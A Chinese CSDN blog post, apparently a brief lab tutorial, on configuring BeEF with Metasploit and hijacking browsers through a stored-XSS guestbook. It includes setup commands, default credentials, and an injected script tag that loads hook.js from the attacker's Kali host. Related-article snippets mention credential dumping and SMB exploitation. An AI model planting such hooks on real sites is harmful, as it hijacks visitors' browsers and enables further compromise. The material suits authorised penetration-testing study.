beef +metasploit关联拿shell教程

最新推荐文章于 2023-09-17 14:38:07 发布
最新推荐文章于 2023-09-17 14:38:07 发布
阅读量655 收藏 2
点赞数
分类专栏: 网安 文章标签: linux ubuntu mysql 数据库 centos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44212888/article/details/114243490
版权

参考了网络很多大神文章,简单小结一下,仅供参考
1,配置beef的vim /usr/share/beef-xss/config.yaml,修改此文件metasploit配置为 enable:true 
2,配置vim /usr/share/beef-xss/extensions/metasploit/config.yaml,修改此文件配置两处ip为kali自身ip
3,首次启动msf,先启动postgresql数据库服务service postgresql restart,再启动msfconsole
4,msf终端内输入命令 load msgrpc ServerHost=127.0.0.1 User=msf Pass=abc123   //ServerHost为kali ip,User&Pass为2步骤配置的账号密码
5,修改beef默认账号密码, vim /etc/beef-xss/config.yaml  //修改 User:beef,Password:beef
6,启动beef, beef-xss
1.Kali:IP:192.168.126.140
2.web服务器IP:192.168.126.205 存在XSS跨站脚本漏洞
3.客户端IP:192.168.126.130 
4.Kali使用beef生成恶意代码网络
5.浏览器输入 http://127.0.0.1:3000/ui/panel,登陆beef,Usename与Password均为beef
6.将Hook URL “<scriptsrc="http://1192.168.126.140:3000/hook.js"></script>”写入存在XSS漏洞的web服务器文本框
7.只要客户端访问服务器192.168.126.205留言板,客户端浏览器就会被劫持框
service postgresql start  //启动msf数据库

最低0.47元/天 解锁文章
QQ:1519938366
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metasploit+beef攻击实验
10-12
BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。
Metasploit+Beef整合攻击——超详细
一个懒鬼的博客
05-10 1983
文章目录 前言 一、准备工作 1.配置beef 2.配置Metasploit 二、实际操作 三、Beef隧道代理 总结 前言 BeeF是前欧美最流行的web框架攻击平台,kali 集成Beef,而且Beef有很多好使的payload。例如,通过XSS这个简单的漏洞,BeeF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,beef属于c/s结构,具体看图 zombie(僵尸)即受害的浏览器。
beef获取目标主机用户名和密码.docx
03-29
运用beef获取目标主机用户名和密码 利用beef获得目标主机shell beef是一个用于合法研究和测试目的的专业浏览器漏洞利用框架
beef利用xss漏洞实现攻击
m0_61506558的博客
08-22 1141
beef是一个XSS平台,有非常多的功能Exploit 模块用的最多,但初学者用Browser就足够了Beef-XSS平台基本使用 https://www.bilibili.com/video/av92711691/
MSF-win2003-getshell
最新发布
qq_59826623的博客
09-17 116
许久未用的服务器忘记密码,尝试几次无果后,决定自己打进去看看。
kali下BeEF联合Metasploit
weixin_45524984的博客
12-02 282
kali下BEeF联合Metasploit Metasploit大概就是一个可以用很厉害的工具之类的…… 前几天玩KALI的时候见到有朋友联合BEeFMetasploit,这样就可以在BEeF里面用Metasploit啦!这篇文章很受用: kali下安装beef并联合Metasploit 原文有两个地方要注意 1、运行beef时不要把Metasploit关掉啊QAQ! 2、Metasploit的load msgrpc ServerHost=x.x.x.x Pass=abc123这里,这个abc123时默认
metasploit中可以用最新beef插件
05-04
下载beef 解压到 /pentest/web/beef/ cd /pentest/web/beef/ curl -L get.rvm.io | bash -s stable rvm install 1.9.3 rvm use 1.9.3 ##rvm remove 1.9.2 ruby -v gem install bundler bundle install ./beef 生成一...
Metasploit+Framework:黑掉整个星球
08-14
除了基本的漏洞利用功能,Metasploit还支持自定义模块开发,可以结合其他工具如Beef、Empire等进行更复杂的红队操作。此外,Metasploit Framework还可以与自动化安全工具集成,如OpenVAS和Nessus,实现安全测试的...
docker-beef:BeEF(浏览器开发框架)构建的 Dockerfile
06-20
码头牛肉BeEF 的 Dockerfile(浏览器开发框架) 拉取存储库docker pull malwarelu/beef 启动 BeEF docker docker run malwarelu/beef 正在运行的容器上的 TCP/3000 上可用的服务
【工具使用】——MSF使用_使用MSF抓取用户密码
weixin_45588247的博客
08-08 6648
一、抓取自动登录的密码:   很多用户习惯将计算机设置自动登录,可以使用run windows/gather/credentials/windows_autologin抓取自动登录的用户名和密码。   点击进入:开启windows用户自动登陆的方法! 命令: run windows/gather/credentials/windows_autologin 二、导出密码哈希: 1. run hashdump命令:   hashdump模块可以从SAM数据库中导出本地用户账号,该命令的使用需要系统权限
内网实验1:getshell、上线提权、抓取主机密码
soldi_er的博客
05-11 2850
文章目录概述实验1:phpmyadmin弱口令+写木马 概述   实验目标:省略外部打点过程,侧重于拿到system权限之后的事宜。   环境情况如下,发现宿主机难以访问Win7服务器,可以用Kali访问。 宿主机:192.168.43.56 Kali攻击机:192.168.43.57 Win7外网服务器:192.168.43.100 实验1:phpmyadmin弱口令+写木马   Kali机访问192.168.43.100/phpMyAdmin,弱口令root/root登录。   phpMyAdmin
靶机DC-1练习:借助msfconsole进行漏洞查询利用getshell后,采用suid提权
7Riven's blog
12-10 2490
1.靶机IP地址发现 2.查看靶机版本和服务 -sV:用来扫描目标主机和端口上运行的软件的版本 -p-:扫描0-65535全部端口 -sS/sT/sA/sW/sM:指定使用 TCP SYN/Connect()/ACK/Window/Maimon scans的方式来对目标主机进行扫描 -Pn:选项指示NMAP跳过默认的发现检查并对执行对目标的完整端口扫描。当扫描被阻止ping探针的防火...
CVE-2020-0796漏洞复现getshell
臭nana的博客
06-08 4098
漏洞描述 SMB远程代码执行漏洞 SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。 漏洞原理 Microsoft服务器消息块(SMB)协议是Microsoft Windows中使用的一项Microsoft网络文件共享协议。在大部分windows系统中都是默认开启的,用于在计算机间共享文件、打印机等。 Windows 10和Wi
如何在BeEF中使用metasploit颠覆你的浏览器
收集盒 Book box
07-03 1227
小编:感谢Luke投递,也希望Luke以后能为广大安全爱好者带来更多好书。 BeEF是目前欧美最流行的web框架攻击平台,它的全称是 the Browser exploitation framework project.最近两年国外各种黑客的会议都有它的介绍,很多pentester对这个工具都有很高的赞美。通过XSS这个简单的漏洞,BeEF可以通过一段编制好的javascript控制目标主机的浏
BeefMetasploit的结合
weixin_30633507的博客
10-21 382
先上一张beEF的界面图: 现在我们开始把beEFmetasploit关联起来,首先我们需要了解下beEFmetasploit的几个目录。 beEF的目录是在:/usr/share/beef-xss下 metasploit的两个目录分别是:/opt/metasploit 和/usr/share/metasploit-frame...
beef+metasploit配置方法
weixin_33774615的博客
11-22 931
2019独角兽企业重金招聘Python工程师标准>>> ...
使用Beef劫持客户端浏览器并进一步使用Beef+msf拿客户端shell
热门推荐
MickeyMouse1928的博客
04-08 2万+
利用Beef劫持客户端浏览器   环境: 1.Kali(使用beef生成恶意代码,IP:192.168.114.140) 2.一台web服务器(留言板存在XSS跨站脚本漏洞,IP:192.168.114.204) 3. 客户端(用于访问web服务器,IP:192.168.114.130) 步骤: 1. Kali使用beef生成恶意代码 2. 将恶意代码写入192.168.114.2
xss攻击 beef
09-06
使用beef-xss进行XSS攻击需要在Kali上安装beef-xss工具,并输入"beef-xss"命令来获取恶意代码。如果没有安装beef,需要先进行安装,并按照提示一直输入"y"进行安装。 在进行XSS攻击之前,建议先了解XSS的基本知识和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值